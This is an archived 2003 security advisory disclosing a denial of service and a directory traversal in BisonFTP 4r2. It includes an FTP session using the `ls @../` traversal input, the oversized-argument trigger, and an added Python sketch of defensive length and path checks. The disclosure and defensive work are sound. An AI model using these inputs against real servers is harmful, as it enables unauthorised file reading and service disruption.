[NT] Multiple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)

From: support@securiteam.com
Date: 02/17/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 17 Feb 2003 22:29:54 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Multiple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.bisonftp.com/> BisonFTP Server is a native Windows FTP
    Server. It offers all of the standard features other FTP Servers provide
    and includes such features as S/KEY Password, File Filtering, etc. Two
    security vulnerabilities have been found in the product. They allow a
    remote attacker to make it unable to respond to legitimate requests,
    and to view files and directories that reside outside the bounding FTP
    root directory.

    DETAILS

    Vulnerable systems:
     * BisonFTP version 4r2

    Denial of service:
    BisonFTP is vulnerable to a DoS attack triggered by FTP commands with
    oversized arguments. When the FTP command LS or CWD is sent with 4300
    bytes or more, BisonFTP uses 100% of the CPU until the socket is closed
    by the client.

    Directory Traversal:
    It is possible to trick BisonFTP into revealing confidential information
    about files outside the FTP root:

        ftp> ls @../
        227 Entering PASV Mode (10,10,10,10,4,126)
        150 Directory List Follows
        -rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
        226 Listing complete.
        ftp> mget @../Biso
        local: BisonFTP42.exe remote: BisonFTP42.exe
        227 Entering PASV Mode (10,10,10,10,4,128)
        550 File does not exist
        ftp>
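
The two checks whose absence the DoS and Directory Traversal items describe, as an added example that is not part of the advisory and not BisonFTP code: a length cap applied before a control-channel line is parsed, and a containment test on the canonical path. `MAX_LINE`, `Rejected`, `parse_line` and `resolve` are hypothetical names; the advisory does not say how BisonFTP interprets the leading `@`, so the sketch treats the argument as an ordinary path name and checks the final resolved path.

```python
import os
import tempfile

MAX_LINE = 512  # assumed cap for one control-channel line, far below 4300 bytes


class Rejected(Exception):
    """Carries the FTP reply to send instead of executing the command."""


def parse_line(raw: bytes) -> tuple[str, str]:
    # Bound the input before any parsing work, so an oversized LS or CWD
    # argument is refused immediately instead of being scanned or copied.
    if len(raw) > MAX_LINE:
        raise Rejected("500 Command line too long")
    text = raw.rstrip(b"\r\n").decode("latin-1")
    verb, _, arg = text.partition(" ")
    return verb.upper(), arg


def resolve(root: str, cwd: str, arg: str) -> str:
    """Map a client path to a real path, refusing anything outside root."""
    root_real = os.path.realpath(root)
    # Absolute client paths are relative to the FTP root, others to cwd.
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    candidate = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    # Containment is tested on the canonical result, after ".." and
    # symlinks are resolved, never on the raw string the client sent.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise Rejected("550 Permission denied")
    return candidate


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:  # constructed FTP root
        for arg in ("pub/file.txt", "@../", "../"):
            try:
                print(arg, "->", resolve(root, "/", arg))
            except Rejected as reply:
                print(arg, "->", reply)
```

With this resolver `@../` is a literal entry named `@..` inside the root, while `../` is refused; any server-specific prefix handling has to happen before the containment test, not after it.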

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ja@immune.dk> Immune
    Advisory.
